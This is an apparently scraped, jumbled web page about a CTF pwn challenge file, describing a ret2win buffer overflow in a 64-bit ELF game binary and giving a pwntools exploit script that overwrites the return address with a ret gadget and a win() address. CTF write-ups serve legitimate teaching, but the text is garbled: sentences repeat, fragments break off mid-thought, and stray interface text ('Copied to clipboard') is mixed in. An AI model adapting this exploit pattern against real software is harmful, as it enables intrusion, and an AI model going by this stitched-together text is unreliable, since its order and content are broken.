Pwn_bloodh7nt.rar | No Ads

The binary is a simple 64-bit ELF executable. When run, it simulates a "Blood Hunt" game where you input a name and choose an action. The core of the vulnerability lies in the input handling for the player's name.

To control the program's flow, you first need to find exactly how many bytes are required to reach the return address. You can use with the pwndbg or GEF extension. pwn_bloodh7nt.rar

Create a cyclic pattern (e.g., cyclic 100 ) and input it when prompted for your name. The binary is a simple 64-bit ELF executable

from pwn import * # Setup target = process('./pwn_bloodh7nt') # target = remote('addr', port) # For the live challenge win_addr = 0x40123b # Replace with the actual address from your analysis offset = 40 # Replace with your discovered offset # The Payload # We add a 'ret' gadget if the binary is 64-bit to align the stack for system() calls ret_gadget = 0x40101a payload = b"A" * offset payload += p64(ret_gadget) payload += p64(win_addr) target.sendline(payload) target.interactive() Use code with caution. Copied to clipboard To control the program's flow, you first need

The file is a challenge from the pwn category of the DeadSec CTF 2024 . To solve it, you need to exploit a buffer overflow vulnerability to execute a "ret2win" attack, redirected by a specific game mechanic within the binary.

Once you have the offset and the address of the win() function (found via info functions in GDB or nm binary ), you can write a simple Python exploit using the library:

Below is a breakdown of the exploitation process, which would make for an excellent technical blog post: